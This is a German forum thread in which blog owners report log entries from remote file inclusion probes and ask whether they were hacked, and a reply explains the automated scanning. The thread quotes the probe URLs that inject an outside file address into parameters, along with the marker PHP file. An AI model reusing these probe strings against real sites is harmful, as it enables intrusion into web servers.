Sicherheit: "fs_javascript" in den Logs gefunden

  • Hi Zusammen

    Ich habe heute mehrere merkwürdige Einträge im meinem StatPress gefunden jeweils von unterschiedlichen Rechnern.

    Beispiel:

    HTML
    fs_javascript=http://www.die-grenzreiter.com/content/download/fx29id.txt???


    (URL nicht aufzrufen - Safari gibt einen Warnhinweis!)

    Ich habe insgesamt 5 verschiedene User die diese oder ähnliche Links aufgerufen haben.

    Ist das ein Hack? Bin ich gefährdet?

    Gruss

    Tom

    Nachtrag: Hier der Inhalt einer dieser Text-Dateien:

    <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

    Einmal editiert, zuletzt von der-tom (14. Juni 2009 um 16:13)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hmm... dieser string kann offenbar durch mehrere wege auf einen server kommen. bei mir hat mein Counterize einen URL Aufruf zu meinem blog aufgelistet der wie folgt lautet:

    Code
    http://mein_server.de/blog/?_SERVER[DOCUMENT_ROOT]=http://www.eminlife.com/rss/fx29id1.txt??



    daraufhin hab ich mir diese merkwürdige TXT mal angesehen. wieder erwarten war diese noch auf dem Server des von Eminlife.com gespeichert. hier mal der inhalt der datei

    PHP
    <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>



    Ich frage mich jetzt allerdings auch was es damit aufsich hat. würde mich auch mal interessieren ob das vielleicht ein Hack versuch darstellen soll, und wenn ja, wie ich darauf reagiere oder feststellen kann, ob der versuch geglückt ist.

    währe genial wenn jemand ne lösung hätte.
    gruß
    DJBeatstar

  • Sieht nach ner Remote File Inclusion aus.

    Wenn er sein Script includen kann könnte er alles mögliche bei dir Einschleusen oder hat vllt schon deinen Blog, DB vergiftet.

    Die Datei ist womöglich eine testing Datei, wenn eine "Maschine" von ihm - Server+Cronj - automatisch im Netz nach Blogs sucht, probiert er automatisch mit diesem File eine RFI (Remote File Inc...), wenn erfolgreich, Blog markieren als "hackbar".
    Dann würde er vllt handisch oder mit einer zweiten "Maschine" Tabellen mit Passwörtern oder sonstiges auslesen...und zu guter letzt, wenn er was drauf hat, den SQL Log und Server Log löschen oder manipulieren.

    So könnte es sein, aber wenn das wirklich funktioniert, kann man ja mit ner eignen Datei versuchen, dann ist das ein Bug in WP.

    Grüße

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!